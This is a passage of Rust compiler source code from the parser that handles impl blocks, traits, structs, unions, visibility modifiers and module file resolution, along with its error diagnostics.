// `self.expected_tokens`, therefore, do not use `self.unexpected()` which doesn't
// account for this.
if !self.expect_one_of(&[], &[])? { unreachable!() }
}
Ok((constness, unsafety, asyncness, abi))
}
/// Parses an impl item.
pub fn parse_impl_item(&mut self, at_end: &mut bool) -> PResult<'a, ImplItem> {
maybe_whole!(self, NtImplItem, |x| x);
let attrs = self.parse_outer_attributes()?;
let mut unclosed_delims = vec![];
let (mut item, tokens) = self.collect_tokens(|this| {
let item = this.parse_impl_item_(at_end, attrs);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// See `parse_item` for why this clause is here.
if !item.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
item.tokens = Some(tokens);
}
Ok(item)
}
fn parse_impl_item_(&mut self,
at_end: &mut bool,
mut attrs: Vec<Attribute>) -> PResult<'a, ImplItem> {
let lo = self.span;
let vis = self.parse_visibility(false)?;
let defaultness = self.parse_defaultness();
let (name, node, generics) = if let Some(type_) = self.eat_type() {
let (name, alias, generics) = type_?;
let kind = match alias {
AliasKind::Weak(typ) => ast::ImplItemKind::Type(typ),
AliasKind::Existential(bounds) => ast::ImplItemKind::Existential(bounds),
};
(name, kind, generics)
} else if self.is_const_item() {
// This parses the grammar:
// ImplItemConst = "const" Ident ":" Ty "=" Expr ";"
self.expect_keyword(kw::Const)?;
let name = self.parse_ident()?;
self.expect(&token::Colon)?;
let typ = self.parse_ty()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr()?;
self.expect(&token::Semi)?;
(name, ast::ImplItemKind::Const(typ, expr), ast::Generics::default())
} else {
let (name, inner_attrs, generics, node) = self.parse_impl_method(&vis, at_end)?;
attrs.extend(inner_attrs);
(name, node, generics)
};
Ok(ImplItem {
id: ast::DUMMY_NODE_ID,
span: lo.to(self.prev_span),
ident: name,
vis,
defaultness,
attrs,
generics,
node,
tokens: None,
})
}
fn complain_if_pub_macro(&self, vis: &VisibilityKind, sp: Span) {
match *vis {
VisibilityKind::Inherited => {}
_ => {
let is_macro_rules: bool = match self.token {
token::Ident(sid, _) => sid.name == sym::macro_rules,
_ => false,
};
let mut err = if is_macro_rules {
let mut err = self.diagnostic()
.struct_span_err(sp, "can't qualify macro_rules invocation with `pub`");
err.span_suggestion(
sp,
"try exporting the macro",
"#[macro_export]".to_owned(),
Applicability::MaybeIncorrect // speculative
);
err
} else {
let mut err = self.diagnostic()
.struct_span_err(sp, "can't qualify macro invocation with `pub`");
err.help("try adjusting the macro to put `pub` inside the invocation");
err
};
err.emit();
}
}
}
fn missing_assoc_item_kind_err(&self, item_type: &str, prev_span: Span)
-> DiagnosticBuilder<'a>
{
let expected_kinds = if item_type == "extern" {
"missing `fn`, `type`, or `static`"
} else {
"missing `fn`, `type`, or `const`"
};
// Given this code `path(`, it seems like this is not
// setting the visibility of a macro invocation, but rather
// a mistyped method declaration.
// Create a diagnostic pointing out that `fn` is missing.
//
// x | pub path(&self) {
// | ^ missing `fn`, `type`, or `const`
// pub path(
// ^^ `sp` below will point to this
let sp = prev_span.between(self.prev_span);
let mut err = self.diagnostic().struct_span_err(
sp,
&format!("{} for {}-item declaration",
expected_kinds, item_type));
err.span_label(sp, expected_kinds);
err
}
/// Parses a method or a macro invocation in an impl block.
fn parse_impl_method(&mut self, vis: &Visibility, at_end: &mut bool)
-> PResult<'a, (Ident, Vec<Attribute>, ast::Generics,
ast::ImplItemKind)> {
// code copied from parse_macro_use_or_failure... abstraction!
if let Some(mac) = self.parse_assoc_macro_invoc("impl", Some(vis), at_end)? {
// method macro
Ok((Ident::invalid(), vec![], ast::Generics::default(),
ast::ImplItemKind::Macro(mac)))
} else {
let (constness, unsafety, asyncness, abi) = self.parse_fn_front_matter()?;
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let decl = self.parse_fn_decl_with_self(|p| {
p.parse_arg_general(true, true, false)
})?;
generics.where_clause = self.parse_where_clause()?;
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
let header = ast::FnHeader { abi, unsafety, constness, asyncness };
Ok((ident, inner_attrs, generics, ast::ImplItemKind::Method(
ast::MethodSig { header, decl },
body
)))
}
}
/// Parses `trait Foo { ... }` or `trait Foo = Bar;`.
fn parse_item_trait(&mut self, is_auto: IsAuto, unsafety: Unsafety) -> PResult<'a, ItemInfo> {
let ident = self.parse_ident()?;
let mut tps = self.parse_generics()?;
// Parse optional colon and supertrait bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(Some(self.prev_span))?
} else {
Vec::new()
};
if self.eat(&token::Eq) {
// it's a trait alias
let bounds = self.parse_generic_bounds(None)?;
tps.where_clause = self.parse_where_clause()?;
self.expect(&token::Semi)?;
if is_auto == IsAuto::Yes {
let msg = "trait aliases cannot be `auto`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
if unsafety != Unsafety::Normal {
let msg = "trait aliases cannot be `unsafe`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
Ok((ident, ItemKind::TraitAlias(tps, bounds), None))
} else {
// it's a normal trait
tps.where_clause = self.parse_where_clause()?;
self.expect(&token::OpenDelim(token::Brace))?;
let mut trait_items = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
if let token::DocComment(_) = self.token {
if self.look_ahead(1,
|tok| tok == &token::Token::CloseDelim(token::Brace)) {
let mut err = self.diagnostic().struct_span_err_with_code(
self.span,
"found a documentation comment that doesn't document anything",
DiagnosticId::Error("E0584".into()),
);
err.help("doc comments must come before what they document, maybe a \
comment was intended with `//`?",
);
err.emit();
self.bump();
continue;
}
}
let mut at_end = false;
match self.parse_trait_item(&mut at_end) {
Ok(item) => trait_items.push(item),
Err(mut e) => {
e.emit();
if !at_end {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Break);
}
}
}
}
Ok((ident, ItemKind::Trait(is_auto, unsafety, tps, bounds, trait_items), None))
}
}
fn choose_generics_over_qpath(&self) -> bool {
// There's an ambiguity between generic parameters and qualified paths in impls.
// If we see `<` it may start both, so we have to inspect some following tokens.
// The following combinations can only start generics,
// but not qualified paths (with one exception):
// `<` `>` - empty generic parameters
// `<` `#` - generic parameters with attributes
// `<` (LIFETIME|IDENT) `>` - single generic parameter
// `<` (LIFETIME|IDENT) `,` - first generic parameter in a list
// `<` (LIFETIME|IDENT) `:` - generic parameter with bounds
// `<` (LIFETIME|IDENT) `=` - generic parameter with a default
// `<` const - generic const parameter
// The only truly ambiguous case is
// `<` IDENT `>` `::` IDENT ...
// we disambiguate it in favor of generics (`impl<T> ::absolute::Path<T> { ... }`),
// because this is what is almost always expected in practice; qualified paths in impls
// (`impl <Type>::AssocTy { ... }`) aren't even allowed by the type checker at the moment.
self.token == token::Lt &&
(self.look_ahead(1, |t| t == &token::Pound || t == &token::Gt) ||
self.look_ahead(1, |t| t.is_lifetime() || t.is_ident()) &&
self.look_ahead(2, |t| t == &token::Gt || t == &token::Comma ||
t == &token::Colon || t == &token::Eq) ||
self.is_keyword_ahead(1, &[kw::Const]))
}
fn parse_impl_body(&mut self) -> PResult<'a, (Vec<ImplItem>, Vec<Attribute>)> {
self.expect(&token::OpenDelim(token::Brace))?;
let attrs = self.parse_inner_attributes()?;
let mut impl_items = Vec::new();
while !self.eat(&token::CloseDelim(token::Brace)) {
let mut at_end = false;
match self.parse_impl_item(&mut at_end) {
Ok(impl_item) => impl_items.push(impl_item),
Err(mut err) => {
err.emit();
if !at_end {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Break);
}
}
}
}
Ok((impl_items, attrs))
}
/// Parses an implementation item; the `impl` keyword has already been parsed.
///
/// impl<'a, T> TYPE { /* impl items */ }
/// impl<'a, T> TRAIT for TYPE { /* impl items */ }
/// impl<'a, T> !TRAIT for TYPE { /* impl items */ }
///
/// We actually parse a slightly more relaxed grammar for better error reporting and recovery.
/// `impl` GENERICS `!`? TYPE `for`? (TYPE | `..`) (`where` PREDICATES)? `{` BODY `}`
/// `impl` GENERICS `!`? TYPE (`where` PREDICATES)? `{` BODY `}`
fn parse_item_impl(&mut self, unsafety: Unsafety, defaultness: Defaultness)
-> PResult<'a, ItemInfo> {
// First, parse generic parameters if necessary.
let mut generics = if self.choose_generics_over_qpath() {
self.parse_generics()?
} else {
ast::Generics::default()
};
// Disambiguate `impl !Trait for Type { ... }` and `impl ! { ... }` for the never type.
let polarity = if self.check(&token::Not) && self.look_ahead(1, |t| t.can_begin_type()) {
self.bump(); // `!`
ast::ImplPolarity::Negative
} else {
ast::ImplPolarity::Positive
};
// Parse both types and traits as a type, then reinterpret if necessary.
let err_path = |span| ast::Path::from_ident(Ident::new(kw::Invalid, span));
let ty_first = if self.token.is_keyword(kw::For) &&
self.look_ahead(1, |t| t != &token::Lt) {
let span = self.prev_span.between(self.span);
self.struct_span_err(span, "missing trait in a trait impl").emit();
P(Ty { node: TyKind::Path(None, err_path(span)), span, id: ast::DUMMY_NODE_ID })
} else {
self.parse_ty()?
};
// If `for` is missing we try to recover.
let has_for = self.eat_keyword(kw::For);
let missing_for_span = self.prev_span.between(self.span);
let ty_second = if self.token == token::DotDot {
// We need to report this error after `cfg` expansion for compatibility reasons
self.bump(); // `..`, do not add it to expected tokens
Some(DummyResult::raw_ty(self.prev_span, true))
} else if has_for || self.token.can_begin_type() {
Some(self.parse_ty()?)
} else {
None
};
generics.where_clause = self.parse_where_clause()?;
let (impl_items, attrs) = self.parse_impl_body()?;
let item_kind = match ty_second {
Some(ty_second) => {
// impl Trait for Type
if !has_for {
self.struct_span_err(missing_for_span, "missing `for` in a trait impl")
.span_suggestion_short(
missing_for_span,
"add `for` here",
" for ".to_string(),
Applicability::MachineApplicable,
).emit();
}
let ty_first = ty_first.into_inner();
let path = match ty_first.node {
// This notably includes paths passed through `ty` macro fragments (#46438).
TyKind::Path(None, path) => path,
_ => {
self.span_err(ty_first.span, "expected a trait, found type");
err_path(ty_first.span)
}
};
let trait_ref = TraitRef { path, ref_id: ty_first.id };
ItemKind::Impl(unsafety, polarity, defaultness,
generics, Some(trait_ref), ty_second, impl_items)
}
None => {
// impl Type
ItemKind::Impl(unsafety, polarity, defaultness,
generics, None, ty_first, impl_items)
}
};
Ok((Ident::invalid(), item_kind, Some(attrs)))
}
fn parse_late_bound_lifetime_defs(&mut self) -> PResult<'a, Vec<GenericParam>> {
if self.eat_keyword(kw::For) {
self.expect_lt()?;
let params = self.parse_generic_params()?;
self.expect_gt()?;
// We rely on AST validation to rule out invalid cases: There must not be type
// parameters, and the lifetime parameters must not have bounds.
Ok(params)
} else {
Ok(Vec::new())
}
}
/// Parses `struct Foo { ... }`.
fn parse_item_struct(&mut self) -> PResult<'a, ItemInfo> {
let class_name = self.parse_ident()?;
let mut generics = self.parse_generics()?;
// There is a special case worth noting here, as reported in issue #17904.
// If we are parsing a tuple struct it is the case that the where clause
// should follow the field list. Like so:
//
// struct Foo<T>(T) where T: Copy;
//
// If we are parsing a normal record-style struct it is the case
// that the where clause comes before the body, and after the generics.
// So if we look ahead and see a brace or a where-clause we begin
// parsing a record style struct.
//
// Otherwise if we look ahead and see a paren we parse a tuple-style
// struct.
let vdata = if self.token.is_keyword(kw::Where) {
generics.where_clause = self.parse_where_clause()?;
if self.eat(&token::Semi) {
// If we see a `struct Foo<T> where T: Copy;` style decl.
VariantData::Unit(ast::DUMMY_NODE_ID)
} else {
// If we see: `struct Foo<T> where T: Copy { ... }`
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
}
// No `where` so: `struct Foo<T>;`
} else if self.eat(&token::Semi) {
VariantData::Unit(ast::DUMMY_NODE_ID)
// Record-style struct definition
} else if self.token == token::OpenDelim(token::Brace) {
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
// Tuple-style struct definition with optional where-clause.
} else if self.token == token::OpenDelim(token::Paren) {
let body = VariantData::Tuple(self.parse_tuple_struct_body()?, ast::DUMMY_NODE_ID);
generics.where_clause = self.parse_where_clause()?;
self.expect(&token::Semi)?;
body
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where`, `{{`, `(`, or `;` after struct name, found {}",
token_str
));
err.span_label(self.span, "expected `where`, `{`, `(`, or `;` after struct name");
return Err(err);
};
Ok((class_name, ItemKind::Struct(vdata, generics), None))
}
/// Parses `union Foo { ... }`.
fn parse_item_union(&mut self) -> PResult<'a, ItemInfo> {
let class_name = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let vdata = if self.token.is_keyword(kw::Where) {
generics.where_clause = self.parse_where_clause()?;
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
} else if self.token == token::OpenDelim(token::Brace) {
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where` or `{{` after union name, found {}", token_str));
err.span_label(self.span, "expected `where` or `{` after union name");
return Err(err);
};
Ok((class_name, ItemKind::Union(vdata, generics), None))
}
fn parse_record_struct_body(
&mut self,
) -> PResult<'a, (Vec<StructField>, /* recovered */ bool)> {
let mut fields = Vec::new();
let mut recovered = false;
if self.eat(&token::OpenDelim(token::Brace)) {
while self.token != token::CloseDelim(token::Brace) {
let field = self.parse_struct_decl_field().map_err(|e| {
self.recover_stmt();
recovered = true;
e
});
match field {
Ok(field) => fields.push(field),
Err(mut err) => {
err.emit();
}
}
}
self.eat(&token::CloseDelim(token::Brace));
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where`, or `{{` after struct name, found {}", token_str));
err.span_label(self.span, "expected `where`, or `{` after struct name");
return Err(err);
}
Ok((fields, recovered))
}
fn parse_tuple_struct_body(&mut self) -> PResult<'a, Vec<StructField>> {
// This is the case where we find `struct Foo<T>(T) where T: Copy;`
// Unit like structs are handled in parse_item_struct function
let fields = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| {
let attrs = p.parse_outer_attributes()?;
let lo = p.span;
let vis = p.parse_visibility(true)?;
let ty = p.parse_ty()?;
Ok(StructField {
span: lo.to(ty.span),
vis,
ident: None,
id: ast::DUMMY_NODE_ID,
ty,
attrs,
})
})?;
Ok(fields)
}
/// Parses a structure field declaration.
fn parse_single_struct_field(&mut self,
lo: Span,
vis: Visibility,
attrs: Vec<Attribute> )
-> PResult<'a, StructField> {
let mut seen_comma: bool = false;
let a_var = self.parse_name_and_ty(lo, vis, attrs)?;
if self.token == token::Comma {
seen_comma = true;
}
match self.token {
token::Comma => {
self.bump();
}
token::CloseDelim(token::Brace) => {}
token::DocComment(_) => {
let previous_span = self.prev_span;
let mut err = self.span_fatal_err(self.span, Error::UselessDocComment);
self.bump(); // consume the doc comment
let comma_after_doc_seen = self.eat(&token::Comma);
// `seen_comma` is always false here because we are inside a doc comment
// block; the condition is kept explicit for readability.
if !seen_comma && comma_after_doc_seen {
seen_comma = true;
}
if comma_after_doc_seen || self.token == token::CloseDelim(token::Brace) {
err.emit();
} else {
if !seen_comma {
let sp = self.sess.source_map().next_point(previous_span);
err.span_suggestion(
sp,
"missing comma here",
",".into(),
Applicability::MachineApplicable
);
}
return Err(err);
}
}
_ => {
let sp = self.sess.source_map().next_point(self.prev_span);
let mut err = self.struct_span_err(sp, &format!("expected `,`, or `}}`, found {}",
self.this_token_descr()));
if self.token.is_ident() {
// This is likely another field; emit the diagnostic and keep going
err.span_suggestion(
sp,
"try adding a comma",
",".into(),
Applicability::MachineApplicable,
);
err.emit();
} else {
return Err(err)
}
}
}
Ok(a_var)
}
/// Parses an element of a struct declaration.
fn parse_struct_decl_field(&mut self) -> PResult<'a, StructField> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let vis = self.parse_visibility(false)?;
self.parse_single_struct_field(lo, vis, attrs)
}
/// Parses `pub`, `pub(crate)` and `pub(in path)` plus shortcuts `crate` for `pub(crate)`,
/// `pub(self)` for `pub(in self)` and `pub(super)` for `pub(in super)`.
/// If the following element can't be a tuple (i.e., it's a function definition), then
/// it's not a tuple struct field, and the contents within the parentheses aren't valid,
/// so emit a proper diagnostic.
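/// For example (illustrative, not from the original source): `pub(in crate::foo) fn f() {}`
/// makes `f` visible only within the module `crate::foo`.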
pub fn parse_visibility(&mut self, can_take_tuple: bool) -> PResult<'a, Visibility> {
maybe_whole!(self, NtVis, |x| x);
self.expected_tokens.push(TokenType::Keyword(kw::Crate));
if self.is_crate_vis() {
self.bump(); // `crate`
return Ok(respan(self.prev_span, VisibilityKind::Crate(CrateSugar::JustCrate)));
}
if !self.eat_keyword(kw::Pub) {
// We need a span for our `Spanned<VisibilityKind>`, but there's inherently no
// keyword to grab a span from for inherited visibility; an empty span at the
// beginning of the current token would seem to be the "Schelling span".
return Ok(respan(self.span.shrink_to_lo(), VisibilityKind::Inherited))
}
let lo = self.prev_span;
if self.check(&token::OpenDelim(token::Paren)) {
// We don't `self.bump()` the `(` yet because this might be a struct definition where
// `()` or a tuple might be allowed. For example, `struct Struct(pub (), pub (usize));`.
// Because of this, we only `bump` the `(` if we're assured it is appropriate to do so
// by the following tokens.
if self.is_keyword_ahead(1, &[kw::Crate]) &&
self.look_ahead(2, |t| t != &token::ModSep) // account for `pub(crate::foo)`
{
// `pub(crate)`
self.bump(); // `(`
self.bump(); // `crate`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(
lo.to(self.prev_span),
VisibilityKind::Crate(CrateSugar::PubCrate),
);
return Ok(vis)
} else if self.is_keyword_ahead(1, &[kw::In]) {
// `pub(in path)`
self.bump(); // `(`
self.bump(); // `in`
let path = self.parse_path(PathStyle::Mod)?; // `path`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(lo.to(self.prev_span), VisibilityKind::Restricted {
path: P(path),
id: ast::DUMMY_NODE_ID,
});
return Ok(vis)
} else if self.look_ahead(2, |t| t == &token::CloseDelim(token::Paren)) &&
self.is_keyword_ahead(1, &[kw::Super, kw::SelfLower])
{
// `pub(self)` or `pub(super)`
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?; // `super`/`self`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(lo.to(self.prev_span), VisibilityKind::Restricted {
path: P(path),
id: ast::DUMMY_NODE_ID,
});
return Ok(vis)
} else if !can_take_tuple { // Provide this diagnostic if this is not a tuple struct
// `pub(something) fn ...` or `struct X { pub(something) y: Z }`
self.bump(); // `(`
let msg = "incorrect visibility restriction";
let suggestion = r##"some possible visibility restrictions are:
`pub(crate)`: visible only on the current crate
`pub(super)`: visible only in the current module's parent
`pub(in path::to::module)`: visible only on the specified path"##;
let path = self.parse_path(PathStyle::Mod)?;
let sp = path.span;
let help_msg = format!("make this visible only to module `{}` with `in`", path);
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let mut err = struct_span_err!(self.sess.span_diagnostic, sp, E0704, "{}", msg);
err.help(suggestion);
err.span_suggestion(
sp, &help_msg, format!("in {}", path), Applicability::MachineApplicable
);
err.emit(); // emit diagnostic, but continue with public visibility
}
}
Ok(respan(lo, VisibilityKind::Public))
}
/// Parses defaultness (i.e., `default` or nothing).
fn parse_defaultness(&mut self) -> Defaultness {
// `pub` is included for better error messages
if self.check_keyword(kw::Default) &&
self.is_keyword_ahead(1, &[
kw::Impl,
kw::Const,
kw::Fn,
kw::Unsafe,
kw::Extern,
kw::Type,
kw::Pub,
])
{
self.bump(); // `default`
Defaultness::Default
} else {
Defaultness::Final
}
}
/// Given a termination token, parses all of the items in a module.
fn parse_mod_items(&mut self, term: &token::Token, inner_lo: Span) -> PResult<'a, Mod> {
let mut items = vec![];
while let Some(item) = self.parse_item()? {
items.push(item);
self.maybe_consume_incorrect_semicolon(&items);
}
if !self.eat(term) {
let token_str = self.this_token_descr();
if !self.maybe_consume_incorrect_semicolon(&items) {
let mut err = self.fatal(&format!("expected item, found {}", token_str));
err.span_label(self.span, "expected item");
return Err(err);
}
}
let hi = if self.span.is_dummy() {
inner_lo
} else {
self.prev_span
};
Ok(ast::Mod {
inner: inner_lo.to(hi),
items,
inline: true
})
}
fn parse_item_const(&mut self, m: Option<Mutability>) -> PResult<'a, ItemInfo> {
let id = if m.is_none() { self.parse_ident_or_underscore() } else { self.parse_ident() }?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
self.expect(&token::Eq)?;
let e = self.parse_expr()?;
self.expect(&token::Semi)?;
let item = match m {
Some(m) => ItemKind::Static(ty, m, e),
None => ItemKind::Const(ty, e),
};
Ok((id, item, None))
}
/// Parses a `mod <foo> { ... }` or `mod <foo>;` item.
fn parse_item_mod(&mut self, outer_attrs: &[Attribute]) -> PResult<'a, ItemInfo> {
let (in_cfg, outer_attrs) = {
let mut strip_unconfigured = crate::config::StripUnconfigured {
sess: self.sess,
features: None, // don't perform gated feature checking
};
let mut outer_attrs = outer_attrs.to_owned();
strip_unconfigured.process_cfg_attrs(&mut outer_attrs);
(!self.cfg_mods || strip_unconfigured.in_cfg(&outer_attrs), outer_attrs)
};
let id_span = self.span;
let id = self.parse_ident()?;
if self.eat(&token::Semi) {
if in_cfg && self.recurse_into_file_modules {
// This mod is in an external file. Let's go get it!
let ModulePathSuccess { path, directory_ownership, warn } =
self.submod_path(id, &outer_attrs, id_span)?;
let (module, mut attrs) =
self.eval_src_mod(path, directory_ownership, id.to_string(), id_span)?;
// Record that we fetched the mod from an external file
if warn {
let attr = Attribute {
id: attr::mk_attr_id(),
style: ast::AttrStyle::Outer,
path: ast::Path::from_ident(
Ident::with_empty_ctxt(sym::warn_directory_ownership)),
tokens: TokenStream::empty(),
is_sugared_doc: false,
span: DUMMY_SP,
};
attr::mark_known(&attr);
attrs.push(attr);
}
Ok((id, ItemKind::Mod(module), Some(attrs)))
} else {
let placeholder = ast::Mod {
inner: DUMMY_SP,
items: Vec::new(),
inline: false
};
Ok((id, ItemKind::Mod(placeholder), None))
}
} else {
let old_directory = self.directory.clone();
self.push_directory(id, &outer_attrs);
self.expect(&token::OpenDelim(token::Brace))?;
let mod_inner_lo = self.span;
let attrs = self.parse_inner_attributes()?;
let module = self.parse_mod_items(&token::CloseDelim(token::Brace), mod_inner_lo)?;
self.directory = old_directory;
Ok((id, ItemKind::Mod(module), Some(attrs)))
}
}
fn push_directory(&mut self, id: Ident, attrs: &[Attribute]) {
if let Some(path) = attr::first_attr_value_str_by_name(attrs, sym::path) {
self.directory.path.to_mut().push(&path.as_str());
self.directory.ownership = DirectoryOwnership::Owned { relative: None };
} else {
// We have to push on the current module name in the case of relative
// paths in order to ensure that any additional module paths from inline
// `mod x { ... }` come after the relative extension.
//
// For example, a `mod z { ... }` inside `x/y.rs` should set the current
// directory path to `/x/y/z`, not `/x/z` with a relative offset of `y`.
if let DirectoryOwnership::Owned { relative } = &mut self.directory.ownership {
if let Some(ident) = relative.take() { // remove the relative offset
self.directory.path.to_mut().push(ident.as_str());
}
}
self.directory.path.to_mut().push(&id.as_str());
}
}
pub fn submod_path_from_attr(attrs: &[Attribute], dir_path: &Path) -> Option<PathBuf> {
if let Some(s) = attr::first_attr_value_str_by_name(attrs, sym::path) {
let s = s.as_str();
// On windows, the base path might have the form
// `\\?\foo\bar` in which case it does not tolerate
// mixed `/` and `\` separators, so canonicalize
// `/` to `\`.
#[cfg(windows)]
let s = s.replace("/", "\\");
Some(dir_path.join(s))
} else {
None
}
}
/// Returns a path to a module.
pub fn default_submod_path(
id: ast::Ident,
relative: Option<ast::Ident>,
dir_path: &Path,
source_map: &SourceMap) -> ModulePath
{
// If we're in a foo.rs file instead of a mod.rs file,
// we need to look for submodules in
// `./foo/<id>.rs` and `./foo/<id>/mod.rs` rather than
// `./<id>.rs` and `./<id>/mod.rs`.
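// Illustrative example (not from the original source): for `mod bar;` declared in
// `x/y.rs`, `relative` is `y`, so the candidates probed below are `x/y/bar.rs`
// (default) and `x/y/bar/mod.rs` (secondary).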
let relative_prefix_string;
let relative_prefix = if let Some(ident) = relative {
relative_prefix_string = format!("{}{}", ident.as_str(), path::MAIN_SEPARATOR);
&relative_prefix_string
} else {
""
};
let mod_name = id.to_string();
let default_path_str = format!("{}{}.rs", relative_prefix, mod_name);
let secondary_path_str = format!("{}{}{}mod.rs",
relative_prefix, mod_name, path::MAIN_SEPARATOR);
let default_path = dir_path.join(&default_path_str);
let secondary_path = dir_path.join(&secondary_path_str);
let default_exists = source_map.file_exists(&default_path);
let secondary_exists = source_map.file_exists(&secondary_path);
let result = match (default_exists, secondary_exists) {
(true, false) => Ok(ModulePathSuccess {
path: default_path,
directory_ownership: DirectoryOwnership::Owned {
relative: Some(id),
},
warn: false,
}),
(false, true) => Ok(ModulePathSuccess {
path: secondary_path,
directory_ownership: DirectoryOwnership::Owned {
relative: None,
},
warn: false,
}),
(false, false) => Err(Error::FileNotFoundForModule {
mod_name: mod_name.clone(),
default_path: default_path_str,
secondary_path: secondary_path_str,
dir_path: dir_path.display().to_string(),
}),
(true, true) => Err(Error::DuplicatePaths {
mod_name: mod_name.clone(),
default_path: default_path_str,
secondary_path: secondary_path_str,
}),
};
ModulePath {
name: mod_name,
path_exists: default_exists || secondary_exists,
result,
}
}
fn submod_path(&mut self,
id: ast::Ident,
outer_attrs: &[Attribute],
id_sp: Span)
-> PResult<'a, ModulePathSuccess> {
if let Some(path) = Parser::submod_path_from_attr(outer_attrs, &self.directory.path) {
return Ok(ModulePathSuccess {
directory_ownership: match path.file_name().and_then(|s| s.to_str()) {
// All `#[path]` files are treated as though they are a `mod.rs` file.
// This means that `mod foo;` declarations inside `#[path]`-included
// files are siblings,
//
// Note that this will produce weirdness when a file named `foo.rs` is
// `#[path]` included and contains a `mod foo;` declaration.
// If you encounter this, it's your own darn fault :P
Some(_) => DirectoryOwnership::Owned { relative: None },
_ => DirectoryOwnership::UnownedViaMod(true),
},
path,
warn: false,
});
}
let relative = match self.directory.ownership {
DirectoryOwnership::Owned { relative } => relative,
DirectoryOwnership::UnownedViaBlock |
DirectoryOwnership::UnownedViaMod(_) => None,
};
let paths = Parser::default_submod_path(
id, relative, &self.directory.path, self.sess.source_map());
match self.directory.ownership {
DirectoryOwnership::Owned { .. } => {
paths.result.map_err(|err| self.span_fatal_err(id_sp, err))
},
DirectoryOwnership::UnownedViaBlock => {
let msg =
"Cannot declare a non-inline module inside a block \
unless it has a path attribute";
let mut err = self.diagnostic().struct_span_err(id_sp, msg);
if paths.path_exists {
let msg = format!("Maybe `use` the module `{}` instead of redeclaring it",
paths.name);
err.span_note(id_sp, &msg);
}
Err(err)
}
DirectoryOwnership::UnownedViaMod(warn) => {
if warn {
if let Ok(result) = paths.result {
return Ok(ModulePathSuccess { warn: true, ..result });
}
}
let mut err = self.diagnostic().struct_span_err(id_sp,
"cannot declare a new module at this location");
if !id_sp.is_dummy() {
let src_path = self.sess.source_map().span_to_filename(id_sp);
if let FileName::Real(src_path) = src_path {
if let Some(stem) = src_path.file_stem() {
let mut dest_path = src_path.clone();
dest_path.set_file_name(stem);
dest_path.push("mod.rs");
err.span_note(id_sp,
&format!("maybe move this module `{}` to its own \
directory via `{}`", src_path.display(),
dest_path.display()));
}
}
}
if paths.path_exists {
err.span_note(id_sp,
&format!("... or maybe `use` the module `{}` instead \
of possibly redeclaring it",
paths.name));
}
Err(err)
}
}
}
/// Reads a module from a source file.
fn eval_src_mod(&mut self,
path: PathBuf,
directory_ownership: DirectoryOwnership,
name: String,
id_sp: Span)
-> PResult<'a, (ast::Mod, Vec<Attribute> )> {
let mut included_mod_stack = self.sess.included_mod_stack.borrow_mut();
if let Some(i) = included_mod_stack.iter().position(|p| *p == path) {
let mut err = String::from("circular modules: ");
let len = included_mod_stack.len();
for p in &included_mod_stack[i.. len] {
err.push_str(&p.to_string_lossy());
err.push_str(" -> ");
}
err.push_str(&path.to_string_lossy());
return Err(self.span_fatal(id_sp, &err[..]));
}
included_mod_stack.push(path.clone());
drop(included_mod_stack);
let mut p0 =
new_sub_parser_from_file(self.sess, &path, directory_ownership, Some(name), id_sp);
p0.cfg_mods = self.cfg_mods;
let mod_inner_lo = p0.span;
let mod_attrs = p0.parse_inner_attributes()?;
let mut m0 = p0.parse_mod_items(&token::Eof, mod_inner_lo)?;
m0.inline = false;
self.sess.included_mod_stack.borrow_mut().pop();
Ok((m0, mod_attrs))
}
/// Parses a function declaration from a foreign module.
fn parse_item_foreign_fn(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
self.expect_keyword(kw::Fn)?;
let (ident, mut generics) = self.parse_fn_header()?;
let decl = self.parse_fn_decl(true)?;
generics.where_clause = self.parse_where_clause()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ast::ForeignItem {
ident,
attrs,
node: ForeignItemKind::Fn(decl, generics),
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis,
})
}
/// Parses a static item from a foreign module.
/// Assumes that the `static` keyword is already parsed.
fn parse_item_foreign_static(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
let mutbl = self.parse_mutability();
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ForeignItem {
ident,
attrs,
node: ForeignItemKind::Static(ty, mutbl),
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis,
})
}
/// Parses a type from a foreign module.
fn parse_item_foreign_type(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
self.expect_keyword(kw::Type)?;
